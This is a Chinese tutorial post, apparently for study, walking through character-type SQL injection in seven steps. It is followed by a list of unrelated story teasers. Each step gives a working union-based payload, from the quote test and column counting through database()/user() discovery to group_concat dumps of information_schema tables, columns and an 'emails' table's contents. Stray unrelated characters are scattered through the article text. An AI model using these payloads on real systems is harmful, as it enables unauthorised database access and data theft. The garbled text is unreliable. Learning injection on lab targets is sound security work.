SQL注入-字符型注入

特別聲明：該文章只運(yùn)用于學(xué)習(xí)安全測(cè)試交流之用艾扮，請(qǐng)勿用于其他

第一步：確認(rèn)注入點(diǎn)類型

參數(shù)中輸入' --+頁(yè)面無(wú)報(bào)錯(cuò)提示，推測(cè)存在SQL注入注入類型為字符型

圖-1

第二步：判斷SQL語(yǔ)句中查詢字段數(shù)筐高，拼接2' order by 4 --+ 確認(rèn)SQL鐘查詢字段數(shù)

圖-2

第三步：判斷SQL語(yǔ)句中查詢字段數(shù)展示順序搜囱，拼接 2' and 0=1 union select 1,2,3 --+

圖-3

第四步：查詢當(dāng)前表名和用戶名，id=2' and 0=1 union select 1,database(),user() --+柑土，可見(jiàn)代碼中直接連接了root用戶

圖-4

第五步：查詢所有表名

id= 2 ' and 0=1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

圖-5

第六步：查詢表中列表

id= 2 ' and 0=1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name= 'emails' --+

圖-7

第七步：查詢想要的數(shù)據(jù)

2 ' and 0=1 union select 1,2,group_concat(concat_ws('-',id,email_id)) from `emails` --+

圖-8

• 人面猴

  序言：七十年代末蜀肘，一起剝皮案震驚了整個(gè)濱河市，隨后出現(xiàn)的幾起案子稽屏，更是在濱河造成了極大的恐慌扮宠，老刑警劉巖，帶你破解...

  沈念sama閱讀 217,542評(píng)論 6贊 504
• 死咒

  序言：濱河連續(xù)發(fā)生了三起死亡事件狐榔，死亡現(xiàn)場(chǎng)離奇詭異坛增，居然都是意外死亡，警方通過(guò)查閱死者的電腦和手機(jī)薄腻，發(fā)現(xiàn)死者居然都...

  沈念sama閱讀 92,822評(píng)論 3贊 394
• 救了他兩次的神仙讓他今天三更去死

  文/潘曉璐 我一進(jìn)店門(mén)收捣，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)，“玉大人庵楷，你說(shuō)我怎么就攤上這事罢艾。” “怎么了尽纽？”我有些...

  開(kāi)封第一講書(shū)人閱讀 163,912評(píng)論 0贊 354
• 道士緝兇錄：失蹤的賣(mài)姜人

  文/不壞的土叔 我叫張陵昆婿，是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我蜓斧，道長(zhǎng)仓蛆，這世上最難降的妖魔是什么？ 我笑而不...

  開(kāi)封第一講書(shū)人閱讀 58,449評(píng)論 1贊 293
• ?港島之戀（遺憾婚禮）

  正文 為了忘掉前任挎春，我火速辦了婚禮看疙，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘直奋。我一直安慰自己能庆，他們只是感情好，可當(dāng)我...

  茶點(diǎn)故事閱讀 67,500評(píng)論 6贊 392
• 惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的

  文/花漫 我一把揭開(kāi)白布脚线。 她就那樣靜靜地躺著搁胆，像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上渠旁，一...

  開(kāi)封第一講書(shū)人閱讀 51,370評(píng)論 1贊 302
• 城市分裂傳說(shuō)

  那天攀例，我揣著相機(jī)與錄音，去河邊找鬼顾腊。 笑死粤铭，一個(gè)胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的杂靶。 我是一名探鬼主播梆惯，決...

  沈念sama閱讀 40,193評(píng)論 3贊 418
• 雙鴛鴦連環(huán)套：你想象不到人心有多黑

  文/蒼蘭香墨 我猛地睜開(kāi)眼，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼吗垮！你這毒婦竟也來(lái)了垛吗？” 一聲冷哼從身側(cè)響起，我...

  開(kāi)封第一講書(shū)人閱讀 39,074評(píng)論 0贊 276
• 萬(wàn)榮殺人案實(shí)錄

  序言：老撾萬(wàn)榮一對(duì)情侶失蹤烁登，失蹤者是張志新（化名）和其女友劉穎怯屉，沒(méi)想到半個(gè)月后，有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體防泵，經(jīng)...

  沈念sama閱讀 45,505評(píng)論 1贊 314
• ?護(hù)林員之死

  正文 獨(dú)居荒郊野嶺守林人離奇死亡蚀之，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...

  茶點(diǎn)故事閱讀 37,722評(píng)論 3贊 335
• ?白月光啟示錄

  正文 我和宋清朗相戀三年，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了捷泞。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片足删。...

  茶點(diǎn)故事閱讀 39,841評(píng)論 1贊 348
• 活死人

  序言：一個(gè)原本活蹦亂跳的男人離奇死亡，死狀恐怖锁右，靈堂內(nèi)的尸體忽然破棺而出失受，到底是詐尸還是另有隱情，我是刑警寧澤咏瑟，帶...

  沈念sama閱讀 35,569評(píng)論 5贊 345
• ?日本核電站爆炸內(nèi)幕

  正文 年R本政府宣布拂到，位于F島的核電站，受9級(jí)特大地震影響码泞，放射性物質(zhì)發(fā)生泄漏兄旬。R本人自食惡果不足惜，卻給世界環(huán)境...

  茶點(diǎn)故事閱讀 41,168評(píng)論 3贊 328
• 男人毒藥：我在死后第九天來(lái)索命

  文/蒙蒙 一余寥、第九天 我趴在偏房一處隱蔽的房頂上張望领铐。 院中可真熱鬧，春花似錦宋舷、人聲如沸绪撵。這莊子的主人今日做“春日...

  開(kāi)封第一講書(shū)人閱讀 31,783評(píng)論 0贊 22
• 一樁弒父案祝蝠，背后竟有這般陰謀

  文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)音诈。三九已至幻碱，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間细溅，已是汗流浹背褥傍。 一陣腳步聲響...

  開(kāi)封第一講書(shū)人閱讀 32,918評(píng)論 1贊 269
• 情欲美人皮

  我被黑心中介騙來(lái)泰國(guó)打工， 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留谒兄，地道東北人摔桦。 一個(gè)月前我還...

  沈念sama閱讀 47,962評(píng)論 2贊 370
• 代替公主和親

  正文 我出身青樓社付，卻偏偏與公主長(zhǎng)得像承疲，于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子鸥咖，可洞房花燭夜當(dāng)晚...

  茶點(diǎn)故事閱讀 44,781評(píng)論 2贊 354